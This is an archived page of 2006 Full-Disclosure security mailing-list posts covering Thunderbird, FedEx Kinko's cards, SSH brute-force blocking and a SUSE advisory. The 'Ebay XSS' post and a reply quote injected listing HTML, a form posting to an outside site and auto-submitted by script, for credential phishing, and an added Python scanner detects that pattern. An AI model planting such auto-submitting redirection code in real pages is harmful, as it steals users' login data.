Daniel Veditz | 1 Mar 03:35 2006

Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

Daniel Veditz wrote:
> Renaud Lifchitz wrote:
>> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
> 
> We believe this to be a testing error.

I responded too soon. This is indeed a problem in the current release
version of Thunderbird 1.5
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Aaron Horst | 1 Mar 03:48 2006

Ebay XSS

The linked auction demonstrates an XSS flaw within ebay:

http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

The affected code is below the line "On Feb-28-06 at 16:31:39 PST,
seller added the following information:"

<form name="xxx"
action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html">
</form>
<script>
xxx.submit();
</script>

The redirection page seems to be simple spoofing, and emails the data
to cont_26_32 <at> yahoo.com.

AnthraX101

--
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
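
An added example, not part of the original post: a check a site could run over seller-supplied description HTML to flag the pattern quoted above, a form whose action leaves the site together with a script that submits it. The allowed domain list, the finding labels and the `collector.example` host are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: domains the marketplace itself accepts as form targets.
ALLOWED_DOMAINS = {"ebay.com"}

def host_allowed(url, allowed=ALLOWED_DOMAINS):
    """True for same-origin (relative) URLs and for hosts under an allowed domain."""
    parts = urlsplit(url.strip())
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False                      # javascript:, data:, ...
    host = (parts.hostname or "").lower()
    if not host:
        return True                       # relative action stays on the serving site
    return any(host == d or host.endswith("." + d) for d in allowed)

class ListingScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None               # text chunks collected while inside <script>
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            action = dict(attrs).get("action") or ""
            if not host_allowed(action):
                self.findings.append(("offsite-form", action))
        elif tag == "script":
            self._script = []
    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            kind = "auto-submit" if ".submit(" in body else "inline"
            self.findings.append(("script", kind))
            self._script = None

def scan(html):
    scanner = ListingScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample modelled on the markup quoted in the post (placeholder host).
SAMPLE = ('<form name="xxx" action="http://collector.example/Store/SignIn.html">\n'
          '</form>\n<script>\nxxx.submit();\n</script>')

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Any `script` finding in user-supplied markup is already enough to reject or strip the content; the off-site form finding shows where the submitted data would have gone.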

nodialtone | 1 Mar 03:56 2006

Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

On Tue, 2006-02-28 at 21:35, Daniel Veditz wrote:
> Daniel Veditz wrote:
> > Renaud Lifchitz wrote:
> >> Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
> > 
> > We believe this to be a testing error.
> 
> I responded too soon. This is indeed a problem in the current release
> version of Thunderbird 1.5

I think mozilla has released a fix for this.  Or is this something new?

-- 
Unique Security Forums at:
http://www.iatechconsulting.com
Public key: http://www.iatechconsulting.com/dl/nodialtone.asc


Lance James | 1 Mar 03:06 2006

Re: Fedex Kinkos Smart Card Authentication Bypass

Eric B wrote:
> Wait, so if I read this right, consumers with existing cards could
> dupe their legit cards for fake ones and cash in the fake ones yet
> still have credit on the legit card?
>
> So I'm assuming Fedex has no database/authentication system storing
> these serials...brilliant.
>

Yup.

According to Fedex Kinko's:
"Our analysis shows that the information in the article is inaccurate
and not based on the way the actual technology and security function.
Security is a priority to FedEx Kinko's, and we are confident in the
security of our network in preventing such illegal activity."

Our response:

http://ip.securescience.net/exploits/P1010029.JPG

> Good write-up, thanks!
>
> On 2/28/06, *Lance James* <bugtraq <at> securescience.net
> <mailto:bugtraq <at> securescience.net>> wrote:
>
>     Abstract:
>     ---------
>     The ExpressPay stored-value card system used by FedEx Kinko's is
>     vulnerable to attack.  An attacker who gains the ability to alter the

Gary Leons | 1 Mar 08:55 2006

Re: reduction of brute force login attempts via SSH through iptables --hashlimit

On 2/28/06, Josh Berry <josh.berry <at> netschematics.com> wrote:
>
> I guess it makes you feel bigger and better to be an @sshole on a public
> mailing list but I don't think that anyone is impressed with the fact that
> you aren't offering any better ideas; just name-calling and showing a low
> maturity level.
>

I'm not trying to impress you, I'm trying to make sure anyone who uses
this script is aware of the security implications of doing so. This
list is called FULL-DISCLOSURE, which is exactly what I'm doing.

>
> I could be wrong, but doesn't last/lastb show users who have logged
> in/out.  Therefore it wouldn't necessarily catch brute-forcers (unless
> they were actually successful)?

Yes, you could be wrong. How long would it have taken to type man lastb
and check? It lists failed login attempts, which is exactly what you
want.

> This guy was just trying to be helpful and demonstrate a way of blocking
> (or attempting to block) brute-forcers.  You aren't providing any value,
> just being a d!ck.

Are you on the correct mailing list? This list is for the disclosure
of security vulnerabilities. I think adding arbitrary firewall rules
to someone else's machine is a security issue worthy of disclosure by
anyone's standards.

ad@heapoverflow.com | 1 Mar 09:51 2006

Re: Ebay XSS


Aaron Horst wrote:
> The linked auction demonstrates an XSS flaw within ebay:
>
> http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem
>
> The affected code is below the line "On Feb-28-06 at 16:31:39 PST,
> seller added the following information:"
>
> <form name="xxx"
> action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html">
> </form>
> <script>
> xxx.submit();
> </script>
>
> The redirection page seems to be simple spoofing, and emails the data
> to cont_26_32 <at> yahoo.com.
>
> AnthraX101
>
> --
> AnthraX101 -- PGP Key ID# 0x4CD6D0BD
> Fingerprint:
> 8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD

Marcus Meissner | 1 Mar 10:24 2006

SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:013)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                gpg,liby2util
        Announcement ID:        SUSE-SA:2006:013
        Date:                   Wed, 01 Mar 2006 11:00:00 +0000
        Affected Products:      SUSE LINUX 10.0
                                SUSE LINUX 9.3
                                SUSE LINUX 9.2
                                SUSE LINUX 9.1
                                SuSE Linux Desktop 1.0
                                SuSE Linux Enterprise Server 8
                                SUSE LINUX Enterprise Server 9
                                UnitedLinux 1.0
				Open Enterprise Server 1
				Novell Linux Desktop 9
        Vulnerability Type:     remote code execution
        Severity (1-10):        9
        SUSE Default Package:   yes
        Cross-References:       CVE-2006-0455, CVE-2006-0803

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             gpg signature checking problems
           Problem Description

Mayank | 1 Mar 11:57 2006

programming Aeronet card for authentication and configuration in embedded XP

I need to programmatically interact with Cisco aeronet
wireless card on Embedded XP, also I need to enable
EAP-TLS  and PEAP authentication with the AP. The user
interface is not at all available and I need to do it
all by APIs. Is CryptoAPI fully supported and
implemented in embedded XP?
I heard there is something like Cisco API, please let
me know the link for the same…

Cheers,
Mayank


Dude VanWinkle | 1 Mar 14:01 2006

Re: Re: Fedex Kinkos Smart Card Authentication Bypass

On 2/28/06, Lance James <bugtraq <at> securescience.net> wrote:
> Eric B wrote:
> > Wait, so if I read this right, consumers with existing cards could
> > dupe their legit cards for fake ones and cash in the fake ones yet
> > still have credit on the legit card?
> >
> > So I'm assuming Fedex has no database/authentication system storing
> > these serials...brilliant.
> >
>
> Yup.
>
> According to Fedex Kinko's:
> "Our analysis shows that the information in the article is inaccurate
> and not based on the way the actual technology and security function.
> Security is a priority to FedEx Kinko's, and we are confident in the
> security of our network in preventing such illegal activity."
>
> Our response:
>
> http://ip.securescience.net/exploits/P1010029.JPG

lol, now that's a funny picture!

So am I to assume that normally you can go beyond 31337 on a Kinko's
card and this is a modding of the original to produce the displayed
picture?

-JP

Jay Libove | 1 Mar 14:14 2006

reduction of brute force login attempts via SSH through iptables --hashlimit

Well, as expected, this, like most postings here, generated much heat and 
actually a little light :)  Particular thanks to those who went to the 
effort to write scripts to read log files and make a more permanent 
reaction than iptables --hashlimit provides, and to further take the 
expected heat for posting anything here. I'm actually impressed that 
nobody took me to task for something stupid I did in my iptables 
--hashlimit command line. I can't have got it completely right, can I? 
What, not even one "you're a loser" for me? Heh.

The conversation about scripts which read log files and the holes in those 
scripts and the holes in those holes and the *ssholes and... are certainly 
interesting.

I would like to point out that - good old defense in depth - it probably 
is best to use some combination of these things.  Putting together 
iptables --hashlimit with some kind of log file reader will slow down the 
initial attack in real time, and allow a more leisurely (and less system 
intensive) log file scanner to react in not-so-real-time with more 
complete blockages against detected significant attackers.

Based on what I am now seeing in my log files every night after adding the 
hashlimit to my iptables rules, I don't feel a need to add any follow-up 
stronger blocking scripts.  The total number of brute force login attempts 
to my system is now so low that the expected occurrence of a password 
actually being guessed is in the noise just above zero.

Calculation: None of the accounts on my system use dictionary words. They 
aren't based on knowable information about me. And knowable information is 
not what these brute force attacks through SSH are going after anyway - 
they're going after known passwords from weakly configured applications or 